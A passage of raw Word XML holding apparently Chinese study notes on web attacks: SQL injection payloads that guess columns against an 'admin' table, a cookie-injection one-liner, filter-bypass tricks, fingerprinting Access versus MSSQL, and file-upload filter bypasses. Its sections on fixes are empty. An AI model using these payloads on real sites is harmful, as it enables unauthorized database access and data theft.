        <w:t>猜字段数及字段值（列值）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>union</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0048020D" w:rsidRDefault="0048020D" w:rsidP="0048020D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>union select 1,2,3,4,5,6 from admin</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0048020D" w:rsidRDefault="0048020D" w:rsidP="0048020D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>and 1=2 union select null,null,null,null,null,null from admin</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0048020D" w:rsidRDefault="0048020D" w:rsidP="0048020D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IIF</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IIF(</w:t>
      </w:r>
      <w:r>
        <w:t>condition</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>,true,false)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0048020D" w:rsidRDefault="0048020D" w:rsidP="0048020D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IIF(exists(select count(*) from admin),true,false)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0048020D" w:rsidRDefault="0048020D" w:rsidP="00CB44EF"/>
    <w:p w:rsidR="004775D6" w:rsidRDefault="004775D6" w:rsidP="00CB44EF"/>
    <w:p w:rsidR="004775D6" w:rsidRDefault="004775D6" w:rsidP="00CB44EF">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidR="00E72E03">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>OOKIE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注入</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E56328" w:rsidRDefault="00E72E03" w:rsidP="00E56328">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>javascript:alert(document.cookie=</w:t>
      </w:r>
      <w:r w:rsidR="00E56328">
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidR="00E56328">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>id=</w:t>
      </w:r>
      <w:r w:rsidR="00E56328">
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidR="00E56328">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>+escape(</w:t>
      </w:r>
      <w:r w:rsidR="00E56328">
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="00E56328">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>33 and 1=1</w:t>
      </w:r>
      <w:r w:rsidR="00E56328">
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidR="00E56328">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00E56328" w:rsidRPr="00E56328">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E56328" w:rsidRDefault="00E56328" w:rsidP="00E56328">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>javascript:alert(document.cookie=</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>id=</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>+escape(</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">33 and </w:t>
      </w:r>
      <w:r w:rsidR="004A0363">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1=2</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>))</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004775D6" w:rsidRPr="00E56328" w:rsidRDefault="004775D6" w:rsidP="00CB44EF"/>
    <w:p w:rsidR="004775D6" w:rsidRDefault="004775D6" w:rsidP="00CB44EF"/>
    <w:p w:rsidR="004775D6" w:rsidRDefault="004775D6" w:rsidP="00CB44EF"/>
    <w:p w:rsidR="000F0393" w:rsidRDefault="005B10D1" w:rsidP="00547846">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="13" w:name="_Toc468296476"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注入绕过</w:t>
      </w:r>
      <w:r w:rsidR="007E31C9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidR="007E31C9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">CRUD </w:t>
      </w:r>
      <w:r w:rsidR="007E31C9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>增删改查）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13"/>
    </w:p>
    <w:p w:rsidR="003C6573" w:rsidRDefault="003C6573" w:rsidP="006250EF">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>改：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00801A75" w:rsidRDefault="00801A75" w:rsidP="009A4E6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字母大小写替换</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A792E" w:rsidRDefault="000A792E" w:rsidP="000A792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TAB</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或者</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>代替空格</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00025A8E" w:rsidRDefault="00025A8E" w:rsidP="006250EF">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>增：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009A4E64" w:rsidRDefault="009A4E64" w:rsidP="009A4E6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RL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>地址栏中加入“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>%</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>两位任意字符”，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ASP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>会自动去掉</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>%</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>符号。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C7688E" w:rsidRDefault="00C7688E" w:rsidP="009A4E6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发现过滤了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，可以使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00C7688E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t>sele</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:r w:rsidRPr="00C7688E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t>ct</w:t>
      </w:r>
      <w:r w:rsidR="0084227A" w:rsidRPr="0084227A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来绕过</w:t>
      </w:r>
      <w:r w:rsidR="0084227A" w:rsidRPr="0084227A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>select</w:t>
      </w:r>
      <w:r w:rsidR="00866A95">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>检查</w:t>
      </w:r>
      <w:r w:rsidR="00054B8D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（注意检查</w:t>
      </w:r>
      <w:r w:rsidR="007749C1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>与过滤</w:t>
      </w:r>
      <w:r w:rsidR="00054B8D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的区别，</w:t>
      </w:r>
      <w:r w:rsidR="007749C1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>instr</w:t>
      </w:r>
      <w:r w:rsidR="007749C1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是检查，</w:t>
      </w:r>
      <w:r w:rsidR="00054B8D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>replace</w:t>
      </w:r>
      <w:r w:rsidR="007749C1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是过滤</w:t>
      </w:r>
      <w:r w:rsidR="00054B8D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r w:rsidR="00682917">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005B10D1" w:rsidRDefault="005B10D1" w:rsidP="00CB44EF"/>
    <w:p w:rsidR="00892BA4" w:rsidRDefault="00E276F2" w:rsidP="00C53ED8">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:ind w:left="357" w:firstLineChars="0" w:hanging="357"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="14" w:name="_Toc468296477"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注入修补：</w:t>
      </w:r>
      <w:bookmarkEnd w:id="14"/>
    </w:p>
    <w:p w:rsidR="00892BA4" w:rsidRDefault="00892BA4" w:rsidP="00C53ED8">
      <w:pPr>
        <w:outlineLvl w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="15" w:name="_Toc468296478"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>检查：</w:t>
      </w:r>
      <w:bookmarkEnd w:id="15"/>
    </w:p>
    <w:p w:rsidR="00892BA4" w:rsidRDefault="00892BA4" w:rsidP="00892BA4">
      <w:pPr>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00892BA4" w:rsidRDefault="00892BA4" w:rsidP="00892BA4"/>
    <w:p w:rsidR="00892BA4" w:rsidRDefault="00892BA4" w:rsidP="00C53ED8">
      <w:pPr>
        <w:outlineLvl w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="16" w:name="_Toc468296479"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>过滤：</w:t>
      </w:r>
      <w:bookmarkEnd w:id="16"/>
    </w:p>
    <w:p w:rsidR="00892BA4" w:rsidRDefault="00892BA4" w:rsidP="00892BA4"/>
    <w:p w:rsidR="00892BA4" w:rsidRDefault="00892BA4" w:rsidP="00892BA4"/>
    <w:p w:rsidR="00892BA4" w:rsidRDefault="00892BA4" w:rsidP="00C53ED8">
      <w:pPr>
        <w:outlineLvl w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="17" w:name="_Toc468296480"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>编码</w:t>
      </w:r>
      <w:bookmarkEnd w:id="17"/>
    </w:p>
    <w:p w:rsidR="00892BA4" w:rsidRDefault="00892BA4" w:rsidP="00892BA4"/>
    <w:p w:rsidR="00892BA4" w:rsidRDefault="00892BA4" w:rsidP="00892BA4"/>
    <w:p w:rsidR="00892BA4" w:rsidRDefault="00892BA4" w:rsidP="00892BA4"/>
    <w:p w:rsidR="006206DC" w:rsidRDefault="00892BA4" w:rsidP="00C53ED8">
      <w:pPr>
        <w:outlineLvl w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="18" w:name="_Toc468296481"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>转义</w:t>
      </w:r>
      <w:bookmarkEnd w:id="18"/>
    </w:p>
    <w:p w:rsidR="00892BA4" w:rsidRDefault="00892BA4" w:rsidP="00892BA4"/>
    <w:p w:rsidR="00892BA4" w:rsidRDefault="00892BA4" w:rsidP="00892BA4"/>
    <w:p w:rsidR="00892BA4" w:rsidRDefault="00892BA4" w:rsidP="00892BA4"/>
    <w:p w:rsidR="00892BA4" w:rsidRDefault="00892BA4" w:rsidP="00892BA4"/>
    <w:p w:rsidR="004617DC" w:rsidRDefault="004617D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6CC3" w:rsidRDefault="00536B97" w:rsidP="004239DF">
      <w:pPr>
        <w:outlineLvl w:val="1"/>
      </w:pPr>
      <w:bookmarkStart w:id="19" w:name="_Toc468296482"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>针对特定</w:t>
      </w:r>
      <w:r w:rsidR="00CC6CC3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>数据库</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>的攻击</w:t>
      </w:r>
      <w:bookmarkEnd w:id="19"/>
    </w:p>
    <w:p w:rsidR="00883F18" w:rsidRDefault="00CC6CC3" w:rsidP="006D4A18">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="20" w:name="_Toc468296483"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>针对</w:t>
      </w:r>
      <w:r w:rsidR="00853FEF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ACCESS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数据库的攻击</w:t>
      </w:r>
      <w:bookmarkEnd w:id="20"/>
    </w:p>
    <w:p w:rsidR="006750E2" w:rsidRDefault="00E70BE5" w:rsidP="006750E2">
      <w:pPr>
        <w:outlineLvl w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="21" w:name="_Toc468296484"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件</w:t>
      </w:r>
      <w:r w:rsidR="006750E2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>上传漏洞</w:t>
      </w:r>
      <w:bookmarkEnd w:id="21"/>
    </w:p>
    <w:p w:rsidR="00E874CF" w:rsidRPr="00E874CF" w:rsidRDefault="009C5AFC" w:rsidP="006750E2">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>说起上传，这里主要涉及两个变量，第一个就是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>FilePath(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件路径</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，另一个则是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>FileName(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件名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F50DC" w:rsidRPr="008F50DC" w:rsidRDefault="001006F1" w:rsidP="006750E2">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>总体来说，都是因为</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC3CAE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>过渡不严导致</w:t>
      </w:r>
      <w:r w:rsidR="00590758" w:rsidRPr="00DC3CAE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>，加上空格或者“</w:t>
      </w:r>
      <w:r w:rsidR="00590758" w:rsidRPr="00DC3CAE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00590758" w:rsidRPr="00DC3CAE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>”号来绕过过滤。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008F50DC" w:rsidRDefault="00E2526F" w:rsidP="00CB44EF">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>还有一个漏洞</w:t>
      </w:r>
      <w:r w:rsidR="008F50DC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是客户端验证，这个可以直接通过</w:t>
      </w:r>
      <w:r w:rsidR="00F75073">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r w:rsidR="008F50DC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>本地提交的方法绕过，把文件保存到本地</w:t>
      </w:r>
      <w:r w:rsidR="0011170D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>修改然后提交</w:t>
      </w:r>
      <w:r w:rsidR="008F50DC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>即可。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A6727F" w:rsidRDefault="00A6727F" w:rsidP="00CB44EF"/>
    <w:p w:rsidR="00427816" w:rsidRDefault="00BE1A84" w:rsidP="009A3F39">
      <w:pPr>
        <w:outlineLvl w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="22" w:name="_Toc468296485"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>下载任意文件漏洞</w:t>
      </w:r>
      <w:bookmarkEnd w:id="22"/>
    </w:p>
    <w:p w:rsidR="00A6727F" w:rsidRDefault="00A6727F" w:rsidP="00CB44EF"/>
    <w:p w:rsidR="00BE1A84" w:rsidRDefault="00125B19" w:rsidP="009A3F39">
      <w:pPr>
        <w:outlineLvl w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="23" w:name="_Toc468296486"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>删除任意文件漏洞</w:t>
      </w:r>
      <w:bookmarkEnd w:id="23"/>
    </w:p>
    <w:p w:rsidR="00A6727F" w:rsidRDefault="00A6727F" w:rsidP="00CB44EF"/>
    <w:p w:rsidR="00125B19" w:rsidRDefault="00125B19" w:rsidP="00CB44EF"/>
    <w:p w:rsidR="00427816" w:rsidRDefault="00427816" w:rsidP="00CB44EF"/>
    <w:p w:rsidR="00010A97" w:rsidRDefault="00010A97" w:rsidP="006750E2">
      <w:pPr>
        <w:outlineLvl w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="24" w:name="_Toc468296487"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>区分</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ACCESS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>MSSQL</w:t>
      </w:r>
      <w:bookmarkEnd w:id="24"/>
    </w:p>
    <w:p w:rsidR="008E38FB" w:rsidRDefault="00125B50" w:rsidP="006750E2">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">ACCESS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>JET</w:t>
      </w:r>
      <w:r w:rsidR="003E17CF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00125B50" w:rsidRDefault="00125B50" w:rsidP="00CB44EF">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">MSSQL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> ODBC</w:t>
      </w:r>
      <w:r w:rsidR="003E17CF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00125B50" w:rsidRDefault="00010A97" w:rsidP="00CB44EF">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>MSSQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>支持</w:t>
      </w:r>
      <w:r w:rsidR="00C83190">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r w:rsidR="00C83190">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidR="00C83190">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>--</w:t>
      </w:r>
      <w:r w:rsidR="00C83190">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（两个</w:t>
      </w:r>
      <w:r w:rsidR="00C83190">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="00C83190">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>），</w:t>
      </w:r>
      <w:r w:rsidR="00C83190">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r w:rsidR="00C83190">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是分隔语句，</w:t>
      </w:r>
      <w:r w:rsidR="00C83190">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>--</w:t>
      </w:r>
      <w:r w:rsidR="00C83190">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是注释。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00427816" w:rsidRDefault="003E17CF" w:rsidP="00CB44EF">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ACCESS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的特殊表名是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>msysobjects</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E17CF" w:rsidRDefault="003E17CF" w:rsidP="00CB44EF">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>MSSQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中有一个系统表，表名是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sysobjects</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E17CF" w:rsidRDefault="00296953" w:rsidP="00CB44EF">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>exists (select * from sysobjects)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来判断</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AB63A9" w:rsidRDefault="00AB63A9" w:rsidP="00CB44EF"/>
    <w:p w:rsidR="00D716BD" w:rsidRPr="003E17CF" w:rsidRDefault="00D716BD" w:rsidP="00CB44EF"/>
    <w:p w:rsidR="005E31C9" w:rsidRDefault="005E31C9" w:rsidP="00CB44EF"/>
    <w:p w:rsidR="00782178" w:rsidRDefault="00967C37" w:rsidP="00052779">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:numPr>
